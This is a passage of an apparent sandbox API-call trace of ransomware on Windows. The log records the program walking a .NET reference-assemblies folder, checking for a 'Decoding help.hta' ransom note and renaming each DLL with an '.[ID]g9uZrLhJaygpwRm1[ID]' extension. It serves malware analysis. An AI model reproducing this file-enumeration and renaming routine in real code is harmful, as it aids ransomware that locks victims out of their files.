GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\decoding help.hta")) returned 0x1 [0056.641] lstrcmpiW (lpString1="Decoding help.hta", lpString2="System.Data.Linq.dll") returned -1 [0056.641] lstrlenW (lpString="System.Data.Linq.dll") returned 20 [0056.641] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" [0056.641] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned 70 [0056.641] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\", lpString2="System.Data.Linq.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Linq.dll") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Linq.dll" [0056.641] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Linq.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Linq.dll") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Linq.dll" [0056.641] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Linq.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Linq.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Linq.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0056.642] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Linq.dll" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\system.data.linq.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Linq.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\system.data.linq.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0056.647] FindNextFileW (in: hFindFile=0x5e2cb0, lpFindFileData=0x16b9fd30 | out: lpFindFileData=0x16b9fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xad6e6ffe, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xad6e6ffe, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xad7332be, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x71000, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.Data.Services.Client.dll", cAlternateFileName="")) returned 1 [0056.648] lstrcpyW (in: lpString1=0x2ab01088, lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" [0056.648] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned 70 [0056.648] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta" [0056.648] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\decoding help.hta")) returned 0x1 [0056.648] lstrcmpiW (lpString1="Decoding help.hta", lpString2="System.Data.Services.Client.dll") returned -1 [0056.648] lstrlenW (lpString="System.Data.Services.Client.dll") returned 31 [0056.648] lstrcmpiW (lpString1="[ID]", lpString2=".dll") returned 1 [0056.648] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" [0056.648] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned 70 [0056.648] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\", lpString2="System.Data.Services.Client.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Services.Client.dll") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Services.Client.dll" [0056.648] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Services.Client.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Services.Client.dll") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Services.Client.dll" [0056.648] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Services.Client.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Services.Client.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Services.Client.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0056.648] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Services.Client.dll" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\system.data.services.client.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Services.Client.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\system.data.services.client.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0056.648] FindNextFileW (in: hFindFile=0x5e2cb0, lpFindFileData=0x16b9fd30 | out: lpFindFileData=0x16b9fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb097c3db, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb097c3db, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb097c3db, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x28000, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.Data.Services.Design.dll", cAlternateFileName="")) returned 1 [0056.648] lstrcpyW (in: lpString1=0x2ab01088, lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" [0056.649] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned 70 [0056.649] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta" [0056.649] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\decoding help.hta")) returned 0x1 [0056.649] lstrcmpiW (lpString1="Decoding help.hta", lpString2="System.Data.Services.Design.dll") returned -1 [0056.649] lstrlenW (lpString="System.Data.Services.Design.dll") returned 31 [0056.649] lstrcmpiW (lpString1="[ID]", lpString2=".dll") returned 1 [0056.649] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" [0056.649] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned 70 [0056.649] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\", lpString2="System.Data.Services.Design.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Services.Design.dll") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Services.Design.dll" [0056.649] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Services.Design.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Services.Design.dll") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Services.Design.dll" [0056.649] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Services.Design.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Services.Design.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Services.Design.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0056.649] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Services.Design.dll" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\system.data.services.design.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Services.Design.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\system.data.services.design.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0056.649] FindNextFileW (in: hFindFile=0x5e2cb0, lpFindFileData=0x16b9fd30 | out: lpFindFileData=0x16b9fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb09a253b, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb09a253b, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb09c869b, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xa9000, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.Data.Services.dll", cAlternateFileName="")) returned 1 [0056.649] lstrcpyW (in: lpString1=0x2ab01088, lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" [0056.649] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned 70 [0056.649] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta" [0056.649] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\decoding help.hta")) returned 0x1 [0056.649] lstrcmpiW (lpString1="Decoding help.hta", lpString2="System.Data.Services.dll") returned -1 [0056.649] lstrlenW (lpString="System.Data.Services.dll") returned 24 [0056.650] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" [0056.650] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned 70 [0056.650] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\", lpString2="System.Data.Services.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Services.dll") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Services.dll" [0056.650] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Services.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Services.dll") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Services.dll" [0056.650] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Services.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Services.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Services.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0056.650] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Services.dll" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\system.data.services.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Services.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\system.data.services.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0056.650] FindNextFileW (in: hFindFile=0x5e2cb0, lpFindFileData=0x16b9fd30 | out: lpFindFileData=0x16b9fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae5092b8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xae5092b8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xae555578, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x47000, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.DirectoryServices.AccountManagement.dll", cAlternateFileName="")) returned 1 [0056.650] lstrcpyW (in: lpString1=0x2ab01088, lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" [0056.651] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned 70 [0056.651] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta" [0056.651] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\decoding help.hta")) returned 0x1 [0056.651] lstrcmpiW (lpString1="Decoding help.hta", lpString2="System.DirectoryServices.AccountManagement.dll") returned -1 [0056.651] lstrlenW (lpString="System.DirectoryServices.AccountManagement.dll") returned 46 [0056.651] lstrcmpiW (lpString1="[ID]", lpString2=".dll") returned 1 [0056.651] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" [0056.651] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned 70 [0056.651] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\", lpString2="System.DirectoryServices.AccountManagement.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.DirectoryServices.AccountManagement.dll") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.DirectoryServices.AccountManagement.dll" [0056.651] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.DirectoryServices.AccountManagement.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.DirectoryServices.AccountManagement.dll") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.DirectoryServices.AccountManagement.dll" [0056.651] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.DirectoryServices.AccountManagement.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.DirectoryServices.AccountManagement.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.DirectoryServices.AccountManagement.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0056.651] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.DirectoryServices.AccountManagement.dll" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\system.directoryservices.accountmanagement.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.DirectoryServices.AccountManagement.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\system.directoryservices.accountmanagement.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0056.666] FindNextFileW (in: hFindFile=0x5e2cb0, lpFindFileData=0x16b9fd30 | out: lpFindFileData=0x16b9fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb093011a, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb093011a, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb095627b, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x23000, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.Management.Instrumentation.dll", cAlternateFileName="")) returned 1 [0056.668] lstrcpyW (in: lpString1=0x2ab11098, lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" [0056.668] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned 70 [0056.668] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta" [0056.668] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\decoding help.hta")) returned 0x1 [0056.668] lstrcmpiW (lpString1="Decoding help.hta", lpString2="System.Management.Instrumentation.dll") returned -1 [0056.668] lstrlenW (lpString="System.Management.Instrumentation.dll") returned 37 [0056.668] lstrcmpiW (lpString1="[ID]", lpString2=".dll") returned 1 [0056.668] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" [0056.668] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned 70 [0056.668] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\", lpString2="System.Management.Instrumentation.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Management.Instrumentation.dll") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Management.Instrumentation.dll" [0056.668] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Management.Instrumentation.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Management.Instrumentation.dll") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Management.Instrumentation.dll" [0056.669] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Management.Instrumentation.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Management.Instrumentation.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Management.Instrumentation.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0056.669] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Management.Instrumentation.dll" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\system.management.instrumentation.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Management.Instrumentation.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\system.management.instrumentation.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0056.669] FindNextFileW (in: hFindFile=0x5e2cb0, lpFindFileData=0x16b9fd30 | out: lpFindFileData=0x16b9fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xacfe8f51, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xacfe8f51, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xad0cd792, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x3a000, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.Net.dll", cAlternateFileName="")) returned 1 [0056.669] lstrcpyW (in: lpString1=0x2ab11098, lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" [0056.669] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned 70 [0056.669] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta" [0056.669] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\decoding help.hta")) returned 0x1 [0056.669] lstrcmpiW (lpString1="Decoding help.hta", lpString2="System.Net.dll") returned -1 [0056.669] lstrlenW (lpString="System.Net.dll") returned 14 [0056.669] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" [0056.669] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned 70 [0056.669] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\", lpString2="System.Net.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Net.dll") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Net.dll" [0056.669] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Net.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Net.dll") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Net.dll" [0056.669] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Net.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Net.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Net.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0056.669] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Reference 